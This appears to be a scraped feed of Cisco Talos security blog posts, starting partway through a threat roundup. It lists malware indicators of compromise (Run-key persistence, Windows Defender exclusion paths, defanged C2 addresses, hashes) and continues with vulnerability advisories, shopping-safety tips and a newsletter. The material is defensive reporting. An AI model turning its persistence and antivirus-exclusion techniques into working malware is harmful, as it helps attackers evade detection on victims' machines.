<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\MYIMGAPP 24
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\MYIMGAPP\RECENT FILE LIST 24
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\MYIMGAPP\SETTINGS 24
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Snk
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Snk
19
<HKCU>\SOFTWARE\XLR4615DFT-CRBSFT
Value Name: exepath
19
<HKCU>\SOFTWARE\XLR4615DFT-CRBSFT
Value Name: licence
19
<HKCU>\SOFTWARE\XLR4615DFT-CRBSFT 19
<HKCU>\SOFTWARE\NETWIRE 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MServices
1
<HKCU>\SOFTWARE\NETWIRE
Value Name: HostId
1
<HKCU>\SOFTWARE\NETWIRE
Value Name: Install Date
1
MutexesOccurrences
Remcos_Mutex_Inj19
XLR4615DFT-CRBSFT19
IMYGdLWM1
Global\00430b21-08fc-11ea-a007-00501e3ae7b51
Global\006bff81-08fc-11ea-a007-00501e3ae7b51
Global\03cef101-08fc-11ea-a007-00501e3ae7b51
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
186[.]170[.]64[.]8517
186[.]170[.]70[.]1521
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
proyectobasevirtualcol[.]com19
recuperaciondecartera[.]website1
Files and or directories createdOccurrences
%TEMP%\install.vbs19
%APPDATA%\System3219
%APPDATA%\System32\Snk.exe19
%APPDATA%\Runtime319
%APPDATA%\Runtime3\1627.dat19
%TEMP%\<random, matching '[a-z]{4,9}'>.exe15
%TEMP%\8D6B.dmp1
%TEMP%\8adb_appcompat.txt1
%APPDATA%\Install1
%APPDATA%\Install\MServicesNet.exe1

File Hashes

01c3ab58c66605c68709c785147dc5be803235222cdbcf535e03ad312a2475bf 04ee0252ab6db7de6c8b774254265037413a9979ac9c492918ea66b45acedf5c 0ab93b4561aefbb2dbaccfcb8dc2a000ba14c10ca1bf8222da5125b948e5116f 1c6a3d4989760e577e07a238dfc81f511c23d1cc1840418af3fb01264cc8a54c 2ac0166d713688697266de2427af824786fd76d5f110e758108f1ae3a7eb6037 48097d2e7e7bb93c4319223a1829239031a1ebbb641a42dcee1b82ada6f8a179 482a3fe73c9fed841695232330c1316472f6f134a6ae65e1f7da61aea4a246bf 70c958e641eee241550a356c0bf81856e3087757471903ee26bb4751d900249d 72cbc8432180fdc6f242e3ce62b80e269d6ead62df1c054e475690c89e3de560 740f6504c165641c9460c853855a586bab05a92ef6d4d4f0435465ea000840b8 7b067dfdd9a77f27b8b16237027c7d159760fb7bbd7effc3663d1d883a50c086 7f5c18605851bc58ef1eba832d3c16f89492ddaeacabee5fa4ad5c8f7402e4bc 843aa842d5d0a8975e8320318960bac3c5356e6e13be3918358e6cb81395e410 8ddc6f9e1435f94e7f8d6aac4cceb7b751b4a70b7e9c11bc46ce81c2fc1efcf5 9808a934240773b0a1cd470d1d87c9f8f54f54bde5801ceae3113677e9378f52 baabcbcd2c97382f2ca9b5786d21f6ed781f5d91cbea916618c0c7aebfcb90b2 bf8938bb97fc959dfaa4fc13d1ca43106e3c0524a626d5778ff7d5d987d9f90e c157967fafed0df923bfa887e443562d13e159eeb0391aa0e4243ec833aacce3 ca2c6609831dc62ed1560aa03b949a897203e62f3dcad833e6abebde6f15232d d643273166b2e97bd4dff80e0f351404f14f2523d713e2f5691e530d94515327 d91f5a063d69697c887a8f0c495c88d699e118fe3367e1b22eb7cf2fcdcabbbe d96399e30a6ae180e5c138453d7c74129e08ab40fa158cf85e0cf7663ed873dc fbb1fed1b420443abadd4d7d091fd448c85a64d2cf8521aa4152277b7821bf0a fc7f4839fea7be50cdb46251be9dbcc6f974232c8eb0e97f2959d99c629f197f

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP




Win.Dropper.Tofsee-7402230-0

Indicators of Compromise

Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
Value Name: Description
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nguazhnc
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NGUAZHNC
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NGUAZHNC
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NGUAZHNC
Value Name: ErrorControl
1
MutexesOccurrences
{37529D08-A67E-40B3-B0F2-EB87331B47F5}9
Global\<random guid>7
A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A1
A238FB802-231ABE6B-F2351354-74D8EB40-AEDEC6C41
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
239[.]255[.]255[.]2503
69[.]55[.]5[.]2503
216[.]239[.]36[.]213
172[.]217[.]12[.]1963
104[.]47[.]2[.]333
46[.]4[.]52[.]1093
43[.]231[.]4[.]73
213[.]209[.]1[.]1293
104[.]47[.]1[.]333
192[.]0[.]47[.]593
194[.]25[.]134[.]83
144[.]160[.]235[.]1433
216[.]40[.]42[.]43
188[.]125[.]72[.]733
85[.]114[.]134[.]883
46[.]28[.]66[.]23
78[.]31[.]67[.]233
188[.]165[.]238[.]1503
93[.]179[.]69[.]1093
176[.]9[.]114[.]1773
104[.]47[.]45[.]332
47[.]43[.]18[.]92
31[.]13[.]65[.]1742
192[.]36[.]171[.]2032
54[.]184[.]154[.]832
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
250[.]5[.]55[.]69[.]in-addr[.]arpa3
250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org3
250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org3
mta5[.]am0[.]yahoodns[.]net3
mx-eu[.]mail[.]am0[.]yahoodns[.]net3
t-online[.]de3
250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net3
smtp-in[.]libero[.]it3
whois[.]iana[.]org3
libero[.]it3
250[.]5[.]55[.]69[.]bl[.]spamcop[.]net3
yahoo[.]co[.]uk3
whois[.]arin[.]net3
eur[.]olc[.]protection[.]outlook[.]com3
250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org3
hotmail-com[.]olc[.]protection[.]outlook[.]com3
microsoft-com[.]mail[.]protection[.]outlook[.]com3
al-ip4-mx-vip1[.]prodigy[.]net3
mx00[.]t-online[.]de3
msa[.]hinet[.]net3
msa-smtp-mx1[.]hinet[.]net3
irina94[.]rusgirls[.]cn3
anastasiasweety[.]rugirls[.]cn3
beautyrus[.]cn3
ipinfo[.]io2
*See JSON for more IOCs
Files and or directories createdOccurrences
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp13
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt13
%System32%\Tasks\Intel Rapid9
%APPDATA%\Intel Rapid9
%APPDATA%\Intel Rapid\IntelRapid.exe9
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk9
%HOMEPATH%\Start Menu\Programs\Startup\IntelRapid.lnk7
%TEMP%\CC4F.tmp7
%TEMP%\<random, matching '[a-z]{4,9}'>.exe3
%APPDATA%\Microsoft\Crypto\RyukReadMe.html1
%APPDATA%\Microsoft\Document Building Blocks\1033\14\RyukReadMe.html1
%APPDATA%\Microsoft\Document Building Blocks\1033\RyukReadMe.html1
%APPDATA%\Microsoft\Document Building Blocks\RyukReadMe.html1
%APPDATA%\Microsoft\Excel\RyukReadMe.html1
%APPDATA%\Microsoft\HTML Help\RyukReadMe.html1
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\RyukReadMe.html1
%APPDATA%\Microsoft\Internet Explorer\RyukReadMe.html1
%APPDATA%\Microsoft\Internet Explorer\UserData\RyukReadMe.html1
%APPDATA%\Microsoft\MMC\RyukReadMe.html1
%APPDATA%\Microsoft\Office\Recent\RyukReadMe.html1
%APPDATA%\Microsoft\Office\RyukReadMe.html1
%APPDATA%\Microsoft\Outlook\RyukReadMe.html1
%APPDATA%\Microsoft\PowerPoint\RyukReadMe.html1
%APPDATA%\Microsoft\Proof\RyukReadMe.html1
%APPDATA%\Microsoft\Protect\RyukReadMe.html1
*See JSON for more IOCs

File Hashes

4a893b16147c2cd5df11b1f4df08eddc5505f0aafa9f58747ad0f89d53e65492 4b667f73da0fd2cf8b54efa73239e377c10111fd00e08b9ddaa2adee2a873576 4ee405168c9283d73e2ee5913b2c817b824c02e62b8af2750865dc9a6b7e1f4a 75504fa32f3c2e6c56120a26f6af451dc0c688cf1a1dcfe3f656152326ac3584 7acf0435afa75bdc00575208f16f21c0dec8c101fbcefe96836af71c4c628158 8909eeaeb9edc9b01bfae72a64e84b4589c1d2161debee40dd2ab5f5f0ec3858 89678ea136df0b80c0bd0620836624ff785540801ca1f5beec5e7ee76755b684 981a0821cf4b4992d07b5d74ec24a490f4dee396f8e05d66e85cf87809676fe6 9cf0bfd67b4f99bf1ba21175ef3803b18dc774772187b6eb0e610cdacf759cad b8068519f39fb924188bb343eead3b327604a5a09dd3f51fe2486b90b85ac17b bc720a574efb5d1a1a14489ca4d970cfe9d430f6001c2be09e4dc53d2c80b5cb c03e1affd3cb95c110e931d5571cd5d6c8464af36ca1ce1a0114cd9c1eeedb21 d0b333bb1d8c6c153f91a3a5116a1f989c7759dc31f09008288aa720c65371b8 d0c67d3e0edfe1e0d835dbe5d6676c906c418877500b60044f91305d8b4b43ca da58160abd6e306350ecb6647095970ea0dcbcddc1a5b6671b8575885482a824 dd684a06a5d8f00f3e2efb903898d5311d844eb460b7a6a2531f05c69ac56cbe eadaf620c2eb15ad86a06b25ec32533e44b011cad86c9c02f4bdfae7c2e76b7e ec912191e42a253522747774e1de1db3a4e9ce30942b5924518599e3e87c94be ee5a58e36602b2dc16dc0dfa3b3152721ae46e8d13efe436ab647fff0d612a63 ef419240c15389367b533f498b688382d14c57f8befdda8ea6cd5393529e1590 f2f7ced6ea5d6924fcff354da88b905fda434d24b9e2ad4c6f4b5bee5d98b448 fac2a73ee76ccc941ea723ebb1e559c194676a7b5663e948a25a31487ff0193a

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

AMP


Umbrella



Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (15989)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Excessively long PowerShell command detected - (760)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Process hollowing detected - (407)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Kovter injection detected - (347)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
IcedID malware detected - (297)
IcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections.
Gamarue malware detected - (183)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (104)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Dealply adware detected - (60)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Emotet malware detected - (45)
Emotet is a banking Trojan that first appeared in the summer of 2014. It uses Automatic Transfer System (ATS) to steal money from a victim's bank account. The Trojan is distributed through spam that includes a malicious attachment or a link that downloads the Trojan. Emotet uses modules, downloaded by the original Trojan to grab Microsoft Outlook information, modify HTTP/HTTPS traffic and distribute spam. Once executed, it checks for virtual machine processes and injects code into the "Explorer.exe" process. Then it reaches out to its command network to download its modules, each of which can be run without the original loader.
Special Search Offer adware - (31)
Special Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware.

Best practices for staying safe online during the holiday shopping season

$
0
0

By Jon Munshaw.

This holiday shopping season, the basics of avoiding a malware infection boils down to: If it sounds too good to be true, it probably is.

While sometimes retailers do give out small-dollar gift cards, that $500 discount on a new iPhone is probably not real. If it is a scam, it will definitely not help you get your new iPhone 11 Pro Max.

With Black Friday and Cyber Monday, Talos researchers are hitting radio and television networks to alert customers of what to do to stay safe while shopping online. Common attack vectors this time of year include fake websites, coupons, invoices and more, all designed to get shoppers to click on malicious links that eventually lead to adversaries stealing login, banking or personal information.

Craig Williams, the director of Talos Outreach, appeared on the nationally syndicated radio show “This Morning with Gordon Deal” and discussed common attacks. One scam he discussed involves adversaries sending a fake check or gift card to a shopper, asking them to act as a “secret shopper.”

The adversaries have the shopper either verify the in-store money transfer service, like Western Union or MoneyGram, by sending some of the money the shopper received or by purchasing gift cards and sending pictures of them to the adversaries. At this point, the shopper is free to spend the rest of the money on themselves. Eventually, however, the bank realizes that the check is fake and the shopper is left with a massive hole in their bank account. The attackers pocket a nice present from the victim.

Sound overly complicated? Don’t worry, adversaries are still sticking to their bread-and-butter of malicious emails and ads as well.

“Simply viewing the [malicious] page is enough to compromise your machine,” Williams said on Deal’s show. “But opening an attachment is obviously very dangerous. Plus there’s fake invoices, fake coupons, links to sites to get a special deal.”

You can listen to the full show here. Williams’ segment starts around the 8:05 mark.

Another common technique adversaries use is typo-squatting websites for popular retailers. Appearing on KTVU-TV in California, Talos researcher Matt Valites used the example of Nike. If a shopper wanted to buy some shoes, they would usually go to Nike[.]com. But attackers may try to use strikingly similar URLs, such as Niek[.]com, to trick users into thinking they’re on the real site.

But when the shopper goes to enter their login information or credit card number to buy something, the attackers just steal their information.

“Instead of click on [these links], try going directly to the website instead and type in the URL of the website you’re trying to visit,” Valites said. You can view his full segment below.

Here are some other tips for avoiding holiday shopping scams:

  • Only download apps from trusted and official app stores like the Google Play store and iOS App Store. 
  • Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features.
  • Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as @gmail.com).
  • Avoid clicking on unsolicited emails. Make sure you purposefully subscribed to any marketing emails you receive from retailers before opening it.
  • Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals.
  • Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure.
  • Use complex passwords that are unique, per site. Attackers commonly reuse passwords as a way to compromise multiple accounts with the same username. Use a password locker if you have a hard time creating and remembering secure passwords.
  • Manually type in URLs to sites you want to visit rather than clicking on links. 
  • Use two-factor authentication to log into your email account to avoid unauthorized access.

Vulnerability Spotlight: Accusoft ImageGear PNG IHDR width code execution vulnerability

$
0
0

Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Accusoft ImageGear contains two remote code execution vulnerabilities. ImageGear is a document and imaging library from Accusoft that developers can use to build their applications. The library contains the entire document imaging lifecycle. This vulnerability is present in the Accusoft ImageGear library, which is a document-imaging developer toolkit.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Accusoft to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Accusoft ImageGear TIFF TIF_decode_thunderscan code execution vulnerability (TALOS-2019-0875/CVE-2019-5083)

An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll TIF_decode_thunderscan function of Accusoft ImageGear 19.3.0 library. A specially crafted TIFF file can cause an out of bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear PNG IHDR width code execution vulnerability (TALOS-2019-0865/CVE-2019-5076)

An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll PNG header-parser of the Accusoft ImageGear 19.3.0 library. A specially crafted PNG file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear GEM raster code execution vulnerability (TALOS-2019-0921/CVE-2019-5132)

An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll GEM Raster parser of the Accusoft ImageGear 19.3.0 library. A specially crafted GEM file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear BMP code execution vulnerability (TALOS-2019-0922/CVE-2019-5133)

An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll BMP parser of the ImageGear 19.3.0 library. A specially crafted BMP file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Accusoft ImageGear, version 19.3.0, is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 3132, 32889, 50806, 50807, 51530, 51531, 52033, 52034

Vulnerability Spotlight: SQL injection vulnerabilities in Forma Learning Management System

$
0
0

Yuri Kramarz of Security Advisory EMEAR discovered these vulnerabilities. Blog by Jon Munshaw. 

Cisco Talos recently discovered three SQL injection vulnerabilities in the authenticated portion of the Formal Learning Management System. LMS is a set of software that allows companies to build and host different training courses for their employees. The software operates with an open-source licensing model and now operates under the Forma organization.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Forma to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Forma LMS 2.2.1 /appLms/ajax.server.php filter_cat and filter_status parameters SQL injections (TALOS-2019-0904, CVE-2019-5111/CVE-2019-5112)

Exploitable SQL injection vulnerabilities exist in the authenticated portion of Forma LMS 2.2.1. Specially crafted web requests can cause SQL injections. An attacker can send a web request with parameters containing SQL injection attacks to trigger this vulnerability, potentially allowing exfiltration of the database, user credentials and, in certain configurations, access the underlying operating system.

Read the complete vulnerability advisory here for additional information.

Forma LMS 2.2.1 /appCore/index.php users parameter SQL injections (TALOS-2019-0903, CVE-2019-5110)

Exploitable SQL injection vulnerabilities exist in the authenticated portion of Forma LMS 2.2.1. Specially crafted web requests can cause SQL injections. An attacker can send a web request with parameters containing SQL injection attacks to trigger this vulnerability, potentially allowing exfiltration of the database, user credentials and, in certain configurations, access the underlying operating system.

Read the complete vulnerability advisory here for additional information.

Forma LMS 2.2.1 ajax.adm_server.php dir parameter SQL injections (TALOS-2019-0902, CVE-2019-5109)

Exploitable SQL injection vulnerabilities exist in the authenticated portion of Forma LMS 2.2.1. Specially crafted web requests can cause SQL injections. An attacker can send a web request with parameters containing SQL injection attacks to trigger this vulnerability, potentially allowing exfiltration of the database, user credentials and, in certain configurations, access the underlying operating system.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos researchers tested and confirmed that these vulnerabilities impact version 2.2.1 of Forma LMS.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 51611 - 51619

Vulnerability Spotlight: Two vulnerabilities in EmbedThis GoAhead

$
0
0

A Cisco Talos researcher discovered these vulnerabilities. Blog by Jon Munshaw. 

EmbedThis’ GoAhead Web Server contains two vulnerabilities that both arise when the software attempts to process a multi-part/form-data HTTP request. An attacker could exploit these vulnerabilities to remotely execute code on the victim machine, or cause a denial-of-service condition.

GoAhead Web Server is a popular embedded web server designed to be a fully customizable web application framework and server for embedded devices. It provides all the base HTTP server functionality and provides a highly customizable platform for developers of embedded web applications.

In accordance with our coordinated disclosure policy, Cisco Talos worked with EmbedThis to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

EmbedThis GoAhead web server code execution vulnerability (TALOS-2019-0888/CVE-2019-5096)

An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5. A specially crafted HTTP request can lead to a use-after-free condition during the processing of this request that can be used to corrupt heap structures that could lead to full code execution. The request can be unauthenticated in the form of GET or POST requests, and does not require the requested resource to exist on the server.

Read the complete vulnerability advisory here for additional information.

EmbedThis GoAhead web server denial-of-service vulnerability (TALOS-2019-0889/CVE-2019-5097)

A denial-of-service vulnerability exists in the processing of multi-part/form-data requests in the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5. A specially crafted HTTP request can lead to an infinite loop in the process. The request can be unauthenticated in the form of GET or POST requests and does not require the requested resource to exist on the server.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos researchers tested and confirmed that versions 5.0.1, 4.1.1 and 3.6.5 of EmbedThis GoAhead is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 51331, 51332

ClamAV team shows off new Mussels dependency build automation tool

$
0
0

By Micah Snyder.

Today I'm very excited, and a little bit nervous, to unveil Mussels. Mussels is a cross-platform, general-purpose dependency build automation tool. You might compare it with Vcpkg, Conan, or Buildout. It serves a similar purpose, but the approach is a little different.

Mussels is intended to simplify the process of building complex applications that have lengthy dependency chains without having to write all new CMake, Meson, Bazel, XCode, or Visual Studio project files. Instead, you write (and share) simple recipes that leverage the original build systems intended by software authors of your external library dependencies.

For more on Mussels, and where to download it, read the complete post over at the ClamAV blog.

Vulnerability Spotlight: AMD ATI Radeon ATIDXX64.DLL shader functionality sincos denial-of-service vulnerability

$
0
0

Piotr Bania of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered a denial-of-service vulnerability in a specific dll inside of the AMD ATI Radeon line of video cards. This vulnerability can be triggered by supplying a malformed pixel
shader inside a VMware guest operating system. Such an attack can be triggered from VMware guest usermode to cause an out-of-bounds memory read on vmware-vmx.exe process on host, or theoretically through WEBGL.

In accordance with our coordinated disclosure policy, Cisco Talos worked with AMD to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

AMD ATI Radeon ATIDXX64.DLL shader functionality sincos denial-of-service vulnerability (TALOS-2019-0890/CVE-2019-5098)

An exploitable out-of-bounds read vulnerability exists in AMD ATIDXX64.DLL driver, version 26.20.13001.29010. A specially crafted pixel shader can cause out-of-bounds memory read. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from a VMware guest, affecting VMware host.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that AMD ATIDXX64.DLL, version 26.20.13001.29010 running on the Radeon RX 550 / 550 Series inside of VMware Workstation 15 (15.1.0 build-13591040) with Windows 10 x64 as the guest VM.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 51461, 51462

Threat Source newsletter (Dec. 5, 2019)

$
0
0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

We hope everyone had a safe and happy Thanksgiving in the U.S. The holiday shopping season is now in full swing, and there are plenty of deals to be had in stores and online. This also makes it a prime time for attackers to strike. For tips of how to stay safe when shopping this holiday season, check out our full blog post here.

This was also a busy week for vulnerabilities. We disclosed, and released protection, for bugs in the Forma learning management system, Accusoft ImageGear and EmbedThis’ GoAhead Web Server.

We also have a special surprise for you tomorrow. You’ll want to keep an eye on our blog, social media and your podcast feeds.

Upcoming public engagements with Talos

Event: “Signed, Sealed, Compromised: The Past, Present, and Future of Supply Chain Attacks” at CactusCon
Location: Charleston Coliseum & Convention Center, Charleston, WV
Date: Dec. 6 - 7
Speakers: Edmund Brumaghin and Earl Carter
Synopsis: This talk will discuss the common techniques we’re seeing in supply chain attacks. Supply chain attacks are a broad topic, but one that has continued to evolve and mature over the last decade. Nick and Edmund will walk through what a supply chain attack constitutes, the history of how these attacks have evolved, and where we see this attack technique moving in the future.

Cyber Security Week in Review

  • Italian spyware firm Hacking Team is back under new ownership after cratering in 2015. The new management says they are working toward ensuring the company’s technology isn’t abused.  
  • A popular dark web site for selling spying tools was taken down after an international investigation. U.K. law enforcement officials said more than 14,500 people had purchased software from the site, many of whom are being charged with computer misuse crimes. 
  • RCS, a messaging standard meant to replace SMS, is open to several different types of attacks. Despite the advertisement of RCS being more advanced, attackers could still exploit it to steal text messages and listen in on phone calls. 
  • HackerOne, a bug bounty startup, awarded $20,000 to an independent security researcher who the company mistakenly gave inappropriate access to. An analyst sent a cURL command to the community member, which actually gave the user access to all of the bug reports the analyst had worked on. 
  • The actors behind the Magecart credit card-skimming malware used Salesforce’s Heroku platform to host their scripts and stolen information. The group registered for a free Heroku account, using it as a free web hosting service. 
  • Chinese hackers reportedly stole $1 million from a venture capital firm when it was attempting to wire transfer money to an Israeli startup. The group used man-in-the-middle techniques to impersonate emails from the two sides.  
  • American data center provider CyrusOne was hit with a ransomware attack, believed to be in the Sodinokibi family. While the company had not publicly disclosed anything as of Thursday morning, it reportedly is working with law enforcement agencies to recover from the attack. 
  • Pharmaceutical company Merck is still locked in a battle with the company that supplies its cyber insurance over who should pay for the recovery in the aftermath of the NotPetya infection in 2017. The question of whether the attack is covered could boil down to whether NotPetya should be considered an act of war. 
  • The iPhone 11 Pro attempts to access the user’s location data, even if the user has forbidden all apps from accessing that information. However, Apple says this is simply part of the device’s design. 
  • The FBI released a warning advising users that their new smart TVs could be open to cyber attacks. The advisory states an attacker could gain access to the TV and then begin changing the device’s settings or even display inappropriate content. 


Notable recent security issues

Title: Forma LMS open-source program open to SQL injection attacks
